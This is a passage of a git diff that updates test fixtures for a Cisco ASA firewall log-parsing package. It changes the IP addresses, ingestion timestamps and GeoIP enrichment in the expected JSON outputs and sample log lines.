- "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18873,7 +18873,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18882,8 +18882,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168441700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996182Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18919,8 +18919,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18954,7 +18954,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18963,8 +18963,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168446900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996188300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19000,8 +19000,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19035,7 +19035,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19044,8 +19044,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168450800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996194600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19081,8 +19081,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19116,7 +19116,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19125,8 +19125,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168457400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996201300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19162,8 +19162,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19197,7 +19197,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19206,8 +19206,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168463200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996207600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19243,8 +19243,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19278,7 +19278,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19287,8 +19287,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168468200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996215200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19324,8 +19324,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19359,7 +19359,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19368,8 +19368,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168474600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996221700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19405,8 +19405,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19440,7 +19440,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19449,8 +19449,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168482600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996227100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19486,8 +19486,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19521,7 +19521,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19530,8 +19530,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168490300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996232200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19567,8 +19567,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19602,7 +19602,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19611,8 +19611,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168498200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996238400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19648,8 +19648,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19683,7 +19683,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19692,8 +19692,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168516600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996244800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19729,8 +19729,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19764,7 +19764,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19773,8 +19773,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168523300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996249400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19810,8 +19810,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19845,7 +19845,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19854,8 +19854,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168532Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996254700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19891,8 +19891,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19926,7 +19926,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19935,8 +19935,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168536800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996260900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19972,8 +19972,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20007,7 +20007,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20016,8 +20016,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168543200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996266Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20053,8 +20053,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20088,7 +20088,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20097,8 +20097,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168547800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996271Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20134,8 +20134,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20169,7 +20169,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20178,8 +20178,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168553400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996277100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20215,8 +20215,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20250,7 +20250,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20259,8 +20259,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168557600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996281800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20296,8 +20296,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20331,7 +20331,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20340,8 +20340,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168563400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996286800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20377,8 +20377,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20412,7 +20412,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20421,8 +20421,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168571500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996293300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20458,8 +20458,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20493,7 +20493,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20502,8 +20502,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168579500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996299500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20539,8 +20539,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20574,7 +20574,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20583,8 +20583,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168585Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996305800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20620,8 +20620,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20655,7 +20655,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20664,8 +20664,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168588900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996312Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20701,8 +20701,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20736,7 +20736,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20745,8 +20745,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168594500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996318300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20782,8 +20782,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20817,7 +20817,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20826,8 +20826,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168598900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996324500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20863,8 +20863,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20898,7 +20898,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20907,8 +20907,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168603400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996330700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log index a02a1136b19..7b4ae13e9de 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log @@ -1 +1 @@ -Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2 +Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2 diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json index aab578e60d9..c9de8beac99 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json @@ -7,18 +7,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": -1.3614, + "lat": 51.7095 } }, - "address": "1.2.3.4", - "ip": "1.2.3.4" + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -34,13 +40,13 @@ }, "related": { "ip": [ - "1.2.3.4" + "81.2.69.144" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:37.327236200Z", - "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2", + "ingested": "2021-12-09T13:34:15.339875200Z", + "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2", "code": "734001", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index b2ffff8ba6e..cab2b86a191 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -31,7 +31,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-06T20:55:37.499279800Z", + "ingested": "2021-12-09T13:34:15.509140500Z", "original": "Jan 1 01:00:27 beats asa[1234]: %ASA-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-10-06T20:55:37.499289100Z", + "ingested": "2021-12-09T13:34:15.509148700Z", "original": "Jan 1 01:00:30 beats asa[1234]: %ASA-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", @@ -146,7 +146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:37.499295700Z", + "ingested": "2021-12-09T13:34:15.509154300Z", "original": "Jan 1 01:02:12 beats asa[1234]: %ASA-2-106001: Inbound TCP connection denied from 10.13.12.11/45321 to 192.168.33.12/443 flags URG+SYN+RST on interface eth0", "code": "106001", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log index 531c241da79..c51bd423da3 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log @@ -1,2 +1,2 @@ Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0 -Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.0.2.15/0 gaddr 192.0.2.134/57808 laddr 192.0.2.134/57808 type 8 code 0 +Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0 diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json index e47d118b24a..c0aa0eab790 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json @@ -45,7 +45,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:37.810228600Z", + "ingested": "2021-12-09T13:34:15.786608700Z", "original": 